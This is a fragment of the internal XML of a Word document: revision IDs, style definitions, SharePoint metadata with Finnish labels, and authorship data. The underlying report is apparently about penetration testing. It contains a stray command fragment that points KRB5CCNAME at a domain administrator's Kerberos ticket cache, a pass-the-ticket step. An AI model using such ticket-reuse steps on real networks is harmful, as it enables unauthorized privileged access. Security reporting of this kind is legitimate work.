    <w:rsid w:val="00165315"/>
    <w:rsid w:val="00185042"/>
    <w:rsid w:val="001D04D3"/>
    <w:rsid w:val="001E0AF6"/>
    <w:rsid w:val="001E5053"/>
    <w:rsid w:val="0020109F"/>
    <w:rsid w:val="00231267"/>
    <w:rsid w:val="002331C2"/>
    <w:rsid w:val="002727A6"/>
    <w:rsid w:val="00274BA5"/>
    <w:rsid w:val="00277412"/>
    <w:rsid w:val="0028016E"/>
    <w:rsid w:val="002834B9"/>
    <w:rsid w:val="00295033"/>
    <w:rsid w:val="002A7E08"/>
    <w:rsid w:val="002B6FCF"/>
    <w:rsid w:val="002C0B0C"/>
    <w:rsid w:val="002E1F27"/>
    <w:rsid w:val="002E2F87"/>
    <w:rsid w:val="003354E5"/>
    <w:rsid w:val="00341E98"/>
    <w:rsid w:val="003432E0"/>
    <w:rsid w:val="00346995"/>
    <w:rsid w:val="00362D24"/>
    <w:rsid w:val="00366C6D"/>
    <w:rsid w:val="00375C2C"/>
    <w:rsid w:val="003839AF"/>
    <w:rsid w:val="003957CD"/>
    <w:rsid w:val="003A581B"/>
    <w:rsid w:val="003B33C0"/>
    <w:rsid w:val="003C03D5"/>
    <w:rsid w:val="003C36C0"/>
    <w:rsid w:val="003C4166"/>
    <w:rsid w:val="003E5917"/>
    <w:rsid w:val="003E7540"/>
    <w:rsid w:val="00400752"/>
    <w:rsid w:val="00421FF7"/>
    <w:rsid w:val="004252F6"/>
    <w:rsid w:val="004300AA"/>
    <w:rsid w:val="004337B9"/>
    <w:rsid w:val="00444113"/>
    <w:rsid w:val="0045068E"/>
    <w:rsid w:val="004510B7"/>
    <w:rsid w:val="004539BB"/>
    <w:rsid w:val="00465A5E"/>
    <w:rsid w:val="004704A5"/>
    <w:rsid w:val="00475EAB"/>
    <w:rsid w:val="004E703C"/>
    <w:rsid w:val="0050145B"/>
    <w:rsid w:val="00502B8A"/>
    <w:rsid w:val="00533D93"/>
    <w:rsid w:val="00552634"/>
    <w:rsid w:val="005735DD"/>
    <w:rsid w:val="00596770"/>
    <w:rsid w:val="005A5378"/>
    <w:rsid w:val="005B594E"/>
    <w:rsid w:val="005C7E49"/>
    <w:rsid w:val="005E2B3C"/>
    <w:rsid w:val="005F5DF9"/>
    <w:rsid w:val="00602CBE"/>
    <w:rsid w:val="00607350"/>
    <w:rsid w:val="00610FAD"/>
    <w:rsid w:val="0063656C"/>
    <w:rsid w:val="0064551E"/>
    <w:rsid w:val="00673EE8"/>
    <w:rsid w:val="006F320F"/>
    <w:rsid w:val="00706469"/>
    <w:rsid w:val="00715FEF"/>
    <w:rsid w:val="00755BED"/>
    <w:rsid w:val="0077393E"/>
    <w:rsid w:val="00784555"/>
    <w:rsid w:val="007A70B3"/>
    <w:rsid w:val="007C528B"/>
    <w:rsid w:val="007C59E6"/>
    <w:rsid w:val="007E1EE6"/>
    <w:rsid w:val="007E68DD"/>
    <w:rsid w:val="007F0D32"/>
    <w:rsid w:val="0082579D"/>
    <w:rsid w:val="0084173F"/>
    <w:rsid w:val="0086565F"/>
    <w:rsid w:val="0087777B"/>
    <w:rsid w:val="0089733F"/>
    <w:rsid w:val="008A2C0A"/>
    <w:rsid w:val="008C15B9"/>
    <w:rsid w:val="008D50D2"/>
    <w:rsid w:val="00903EEA"/>
    <w:rsid w:val="00904AE0"/>
    <w:rsid w:val="00916B18"/>
    <w:rsid w:val="009178BF"/>
    <w:rsid w:val="00921D10"/>
    <w:rsid w:val="00944E8A"/>
    <w:rsid w:val="0098078B"/>
    <w:rsid w:val="009A0EE6"/>
    <w:rsid w:val="009A3ED1"/>
    <w:rsid w:val="009A63FA"/>
    <w:rsid w:val="009B74B9"/>
    <w:rsid w:val="009C1ACD"/>
    <w:rsid w:val="009C7681"/>
    <w:rsid w:val="009D2A25"/>
    <w:rsid w:val="009F0D02"/>
    <w:rsid w:val="009F1B1D"/>
    <w:rsid w:val="009F3FC0"/>
    <w:rsid w:val="00A426CD"/>
    <w:rsid w:val="00A440CA"/>
    <w:rsid w:val="00A444BF"/>
    <w:rsid w:val="00A86D6C"/>
    <w:rsid w:val="00A97218"/>
    <w:rsid w:val="00AA0161"/>
    <w:rsid w:val="00AA49E1"/>
    <w:rsid w:val="00AA7651"/>
    <w:rsid w:val="00AB5242"/>
    <w:rsid w:val="00AC63BA"/>
    <w:rsid w:val="00AD31A2"/>
    <w:rsid w:val="00B21C85"/>
    <w:rsid w:val="00B26CCD"/>
    <w:rsid w:val="00B37340"/>
    <w:rsid w:val="00B466EB"/>
    <w:rsid w:val="00B5278F"/>
    <w:rsid w:val="00B541C7"/>
    <w:rsid w:val="00B623FF"/>
    <w:rsid w:val="00B63125"/>
    <w:rsid w:val="00B71E94"/>
    <w:rsid w:val="00B80571"/>
    <w:rsid w:val="00B8492A"/>
    <w:rsid w:val="00BA7519"/>
    <w:rsid w:val="00BB2AD9"/>
    <w:rsid w:val="00BB390F"/>
    <w:rsid w:val="00BB3E44"/>
    <w:rsid w:val="00BD0073"/>
    <w:rsid w:val="00BD6490"/>
    <w:rsid w:val="00BE5909"/>
    <w:rsid w:val="00BE751C"/>
    <w:rsid w:val="00C1631B"/>
    <w:rsid w:val="00C166D7"/>
    <w:rsid w:val="00C27A35"/>
    <w:rsid w:val="00C338CF"/>
    <w:rsid w:val="00C41DE5"/>
    <w:rsid w:val="00C5129F"/>
    <w:rsid w:val="00C74626"/>
    <w:rsid w:val="00C77668"/>
    <w:rsid w:val="00C80C1D"/>
    <w:rsid w:val="00C851F5"/>
    <w:rsid w:val="00C96A87"/>
    <w:rsid w:val="00CB2670"/>
    <w:rsid w:val="00CD4745"/>
    <w:rsid w:val="00CF7819"/>
    <w:rsid w:val="00D01335"/>
    <w:rsid w:val="00D0223B"/>
    <w:rsid w:val="00D25BE0"/>
    <w:rsid w:val="00D35BD0"/>
    <w:rsid w:val="00D41DFB"/>
    <w:rsid w:val="00D57E0C"/>
    <w:rsid w:val="00D9499C"/>
    <w:rsid w:val="00DA7646"/>
    <w:rsid w:val="00DB6279"/>
    <w:rsid w:val="00DE397A"/>
    <w:rsid w:val="00DE6AB3"/>
    <w:rsid w:val="00DF3B61"/>
    <w:rsid w:val="00DF624A"/>
    <w:rsid w:val="00E05ADE"/>
    <w:rsid w:val="00E22414"/>
    <w:rsid w:val="00E32FB3"/>
    <w:rsid w:val="00E41185"/>
    <w:rsid w:val="00E5529A"/>
    <w:rsid w:val="00E631FE"/>
    <w:rsid w:val="00E81DAF"/>
    <w:rsid w:val="00E9405E"/>
    <w:rsid w:val="00EA666E"/>
    <w:rsid w:val="00EB1F23"/>
    <w:rsid w:val="00EC5F91"/>
    <w:rsid w:val="00ED305E"/>
    <w:rsid w:val="00ED3528"/>
    <w:rsid w:val="00EE3B87"/>
    <w:rsid w:val="00EE55A9"/>
    <w:rsid w:val="00F0705E"/>
    <w:rsid w:val="00F11FFC"/>
    <w:rsid w:val="00F13243"/>
    <w:rsid w:val="00F32CB4"/>
    <w:rsid w:val="00F66E3C"/>
    <w:rsid w:val="00F767AB"/>
    <w:rsid w:val="00F81080"/>
    <w:rsid w:val="00FA34A6"/>
    <w:rsid w:val="00FD039B"/>
    <w:rsid w:val="00FD766E"/>
    <w:rsid w:val="00FE2C40"/>
    <w:rsid w:val="027B3D77"/>
    <w:rsid w:val="08006D23"/>
    <w:rsid w:val="0976F1FD"/>
    <w:rsid w:val="0A281B10"/>
    <w:rsid w:val="0E2E7086"/>
    <w:rsid w:val="10872EA9"/>
    <w:rsid w:val="11E7483F"/>
    <w:rsid w:val="12A556FF"/>
    <w:rsid w:val="14855548"/>
    <w:rsid w:val="1577DB99"/>
    <w:rsid w:val="174A0438"/>
    <w:rsid w:val="178D6D58"/>
    <w:rsid w:val="17B2B025"/>
    <w:rsid w:val="185A4686"/>
    <w:rsid w:val="1861FAC5"/>
    <w:rsid w:val="1E76A3DC"/>
    <w:rsid w:val="1EBBC1D5"/>
    <w:rsid w:val="20B125AC"/>
    <w:rsid w:val="22AF54F0"/>
    <w:rsid w:val="26ADFE77"/>
    <w:rsid w:val="2C6D51DB"/>
    <w:rsid w:val="2CD7DB7D"/>
    <w:rsid w:val="2E4425D0"/>
    <w:rsid w:val="31B5D227"/>
    <w:rsid w:val="32E0BB57"/>
    <w:rsid w:val="32ECF9E0"/>
    <w:rsid w:val="33E6212C"/>
    <w:rsid w:val="387739E8"/>
    <w:rsid w:val="434ED2DE"/>
    <w:rsid w:val="46614E96"/>
    <w:rsid w:val="473BD33E"/>
    <w:rsid w:val="4797B2C7"/>
    <w:rsid w:val="4AE4D0F9"/>
    <w:rsid w:val="4AF3F8C4"/>
    <w:rsid w:val="52759ABF"/>
    <w:rsid w:val="53A84713"/>
    <w:rsid w:val="569033BD"/>
    <w:rsid w:val="5BC01E9F"/>
    <w:rsid w:val="5C26E81E"/>
    <w:rsid w:val="5CEAF9B9"/>
    <w:rsid w:val="5E827A69"/>
    <w:rsid w:val="69265941"/>
    <w:rsid w:val="6C83AE97"/>
    <w:rsid w:val="6D64AC06"/>
    <w:rsid w:val="6D8BBCFC"/>
    <w:rsid w:val="6D9EE579"/>
    <w:rsid w:val="711C437B"/>
    <w:rsid w:val="7B69ABCD"/>
    <w:rsid w:val="7BF4D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F209"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A3338DDF-81A4-4671-8822-E3BDCCF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85"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00272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2727A6"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="eop">
    <w:name w:val="eop"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002727A6"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="paragraph">
    <w:name w:val="paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0064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66548917">
    <w:name w:val="scxw166548917"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0064551E"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00502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B8A"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="scxw99972573">
    <w:name w:val="scxw99972573"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00607350"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="009F3F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3F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KRB5CCNAME=$PWD/administrator@rt.vle.fi.ccache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KRB5CCNAME=$PWD/administrator@rt.vle.fi.ccach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1bb95-965e-4d37-99a5-21724ce1c7c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4A512770B9D454794610123369934BB" ma:contentTypeVersion="10" ma:contentTypeDescription="Luo uusi asiakirja." ma:contentTypeScope="" ma:versionID="b18243b61f8a6f887cc317a83b8f034a">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="d631bb95-965e-4d37-99a5-21724ce1c7c1" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="71f18ab37426b1622c54a92a48b89304" ns2:_="">
    <xsd:import namespace="d631bb95-965e-4d37-99a5-21724ce1c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bb95-965e-4d37-99a5-21724ce1c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uvien tunnisteet" ma:readOnly="false" ma:fieldId="{5cf76f15-5ced-4ddc-b409-7134ff3c332f}" ma:taxonomyMulti="true" ma:sspId="16af2609-c3e5-4c49-b9fa-7b01c8d298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D30C4B-2C45-419D-A83A-3C2EC785A432}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="d631bb95-965e-4d37-99a5-21724ce1c7c1"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{59B44165-8843-45E2-822F-0797BD593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7A354-D27F-4C4F-8975-E011CE13DE5C}"/>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3993FEF2-5B8A-47E8-AA61-4E9DDCB90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1</Words>
  <Characters>7189</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>4</DocSecurity>
  <Lines>59</Lines>
  <Paragraphs>16</Paragraphs>
  <ScaleCrop>false</ScaleCrop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inen Johannes</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Nurminen Johannes</cp:lastModifiedBy>
  <cp:revision>177</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-24T23:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04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512770B9D454794610123369934BB</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>